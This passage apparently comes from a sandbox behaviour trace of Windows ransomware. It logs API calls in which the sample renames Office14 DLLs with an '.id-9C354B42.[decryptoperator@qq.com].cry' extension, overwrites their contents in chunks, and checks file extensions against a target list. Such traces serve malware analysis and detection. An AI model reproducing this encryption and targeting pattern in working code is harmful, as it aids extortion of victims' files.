ReadFile (in: hFile=0x1c4, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0054.388] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0054.388] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x2a8da0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0054.388] ReadFile (in: hFile=0x1c4, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0054.520] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.521] WriteFile (in: hFile=0x1c4, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0054.540] SetEndOfFile (hFile=0x1c4) returned 1 [0054.540] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fd40b0 [0054.540] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0054.540] WriteFile (in: hFile=0x1c4, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0054.541] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xf848a, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0054.541] WriteFile (in: hFile=0x1c4, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0054.568] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x2a8da0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0054.568] WriteFile (in: hFile=0x1c4, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0054.570] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fd40b0 | out: hHeap=0x600000) returned 1 [0054.570] CloseHandle (hObject=0x1c4) returned 1 [0054.570] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0054.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0054.571] lstrlenW (lpString=".doc") returned 4 [0054.571] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.571] lstrlenW (lpString=".docx") returned 5 [0054.571] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0054.571] lstrlenW (lpString=".pdf") returned 4 [0054.571] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.571] lstrlenW (lpString=".xls") returned 4 [0054.571] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.571] lstrlenW (lpString=".xlsx") returned 5 [0054.571] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0054.571] lstrlenW (lpString=".ppt") returned 4 [0054.571] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0054.571] lstrlenW (lpString=".zip") returned 4 [0054.571] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.571] lstrlenW (lpString=".rar") returned 4 [0054.571] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.571] lstrlenW (lpString=".bz2") returned 4 [0054.571] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.571] lstrlenW (lpString=".7z") returned 3 [0054.571] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0054.571] lstrlenW (lpString=".dbf") returned 4 [0054.571] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0054.571] lstrlenW (lpString=".1cd") returned 4 [0054.571] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0054.571] lstrlenW (lpString=".jpg") returned 4 [0054.571] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0054.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0054.571] lstrlenW (lpString=".doc") returned 4 [0054.571] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.571] lstrlenW (lpString=".docx") returned 5 [0054.572] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0054.572] lstrlenW (lpString=".pdf") returned 4 [0054.572] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.572] lstrlenW (lpString=".xls") returned 4 [0054.572] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.572] lstrlenW (lpString=".xlsx") returned 5 [0054.572] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0054.572] lstrlenW (lpString=".ppt") returned 4 [0054.572] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0054.572] lstrlenW (lpString=".zip") returned 4 [0054.572] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.572] lstrlenW (lpString=".rar") returned 4 [0054.572] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.572] lstrlenW (lpString=".bz2") returned 4 [0054.572] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.572] lstrlenW (lpString=".7z") returned 3 [0054.572] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0054.572] lstrlenW (lpString=".dbf") returned 4 [0054.572] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0054.572] lstrlenW (lpString=".1cd") returned 4 [0054.572] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0054.572] lstrlenW (lpString=".jpg") returned 4 [0054.572] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.572] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0054.572] lstrlenW (lpString="CsiSoap.dll") returned 11 [0054.572] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0054.622] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=1784192) returned 1 [0054.622] CloseHandle (hObject=0x1c4) returned 1 [0054.622] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll")) returned 0x20 [0054.622] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.622] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0054.623] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0054.623] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0054.623] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0054.623] ReadFile (in: hFile=0x1c4, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0054.655] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x9132a, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0054.658] ReadFile (in: hFile=0x1c4, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0054.716] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0054.717] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x173980, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0054.717] ReadFile (in: hFile=0x1c4, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0054.868] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.868] WriteFile (in: hFile=0x1c4, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0054.951] SetEndOfFile (hFile=0x1c4) returned 1 [0055.141] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0055.144] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.144] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.146] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x9132a, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.146] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.148] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x173980, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.149] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.150] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0055.150] CloseHandle (hObject=0x1c4) returned 1 [0055.150] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 67 [0055.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 67 [0055.151] lstrlenW (lpString=".doc") returned 4 [0055.151] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0055.151] lstrlenW (lpString=".docx") returned 5 [0055.151] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0055.151] lstrlenW (lpString=".pdf") returned 4 [0055.151] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.151] lstrlenW (lpString=".xls") returned 4 [0055.151] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0055.151] lstrlenW (lpString=".xlsx") returned 5 [0055.151] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0055.151] lstrlenW (lpString=".ppt") returned 4 [0055.151] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 67 [0055.151] lstrlenW (lpString=".zip") returned 4 [0055.151] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0055.151] lstrlenW (lpString=".rar") returned 4 [0055.151] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0055.151] lstrlenW (lpString=".bz2") returned 4 [0055.151] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0055.151] lstrlenW (lpString=".7z") returned 3 [0055.151] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0055.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 67 [0055.151] lstrlenW (lpString=".dbf") returned 4 [0055.151] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0055.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 67 [0055.151] lstrlenW (lpString=".1cd") returned 4 [0055.151] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0055.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 67 [0055.151] lstrlenW (lpString=".jpg") returned 4 [0055.151] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 67 [0055.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 67 [0055.152] lstrlenW (lpString=".doc") returned 4 [0055.152] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0055.152] lstrlenW (lpString=".docx") returned 5 [0055.152] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0055.152] lstrlenW (lpString=".pdf") returned 4 [0055.152] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.152] lstrlenW (lpString=".xls") returned 4 [0055.152] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0055.152] lstrlenW (lpString=".xlsx") returned 5 [0055.152] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0055.152] lstrlenW (lpString=".ppt") returned 4 [0055.152] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 67 [0055.152] lstrlenW (lpString=".zip") returned 4 [0055.152] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0055.152] lstrlenW (lpString=".rar") returned 4 [0055.152] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0055.152] lstrlenW (lpString=".bz2") returned 4 [0055.152] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0055.152] lstrlenW (lpString=".7z") returned 3 [0055.152] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0055.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 67 [0055.152] lstrlenW (lpString=".dbf") returned 4 [0055.152] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0055.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 67 [0055.152] lstrlenW (lpString=".1cd") returned 4 [0055.152] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0055.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 67 [0055.152] lstrlenW (lpString=".jpg") returned 4 [0055.152] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.152] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0055.152] lstrlenW (lpString="IACOM2.DLL") returned 10 [0055.153] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0055.267] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=4289376) returned 1 [0055.267] CloseHandle (hObject=0x164) returned 1 [0055.267] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll")) returned 0x20 [0055.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.268] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0055.268] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0055.268] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0055.268] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0055.268] ReadFile (in: hFile=0x164, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0055.494] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x15d120, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0055.494] ReadFile (in: hFile=0x164, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0055.529] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0055.529] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x3d7360, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0055.529] ReadFile (in: hFile=0x164, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0055.667] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.667] WriteFile (in: hFile=0x164, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0055.685] SetEndOfFile (hFile=0x164) returned 1 [0055.697] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0055.697] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.697] WriteFile (in: hFile=0x164, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.699] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x15d120, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.699] WriteFile (in: hFile=0x164, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.701] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x3d7360, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.701] WriteFile (in: hFile=0x164, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.702] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0055.702] CloseHandle (hObject=0x164) returned 1 [0055.702] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 66 [0055.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 66 [0055.702] lstrlenW (lpString=".doc") returned 4 [0055.702] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.702] lstrlenW (lpString=".docx") returned 5 [0055.702] lstrcmpiW (lpString1=".docx", lpString2="2.DLL") returned -1 [0055.702] lstrlenW (lpString=".pdf") returned 4 [0055.702] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.702] lstrlenW (lpString=".xls") returned 4 [0055.702] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.702] lstrlenW (lpString=".xlsx") returned 5 [0055.702] lstrcmpiW (lpString1=".xlsx", lpString2="2.DLL") returned -1 [0055.702] lstrlenW (lpString=".ppt") returned 4 [0055.702] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 66 [0055.703] lstrlenW (lpString=".zip") returned 4 [0055.703] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.703] lstrlenW (lpString=".rar") returned 4 [0055.703] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.703] lstrlenW (lpString=".bz2") returned 4 [0055.703] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.703] lstrlenW (lpString=".7z") returned 3 [0055.703] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 66 [0055.703] lstrlenW (lpString=".dbf") returned 4 [0055.703] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 66 [0055.703] lstrlenW (lpString=".1cd") returned 4 [0055.703] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 66 [0055.703] lstrlenW (lpString=".jpg") returned 4 [0055.703] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 66 [0055.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 66 [0055.703] lstrlenW (lpString=".doc") returned 4 [0055.703] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.703] lstrlenW (lpString=".docx") returned 5 [0055.703] lstrcmpiW (lpString1=".docx", lpString2="2.DLL") returned -1 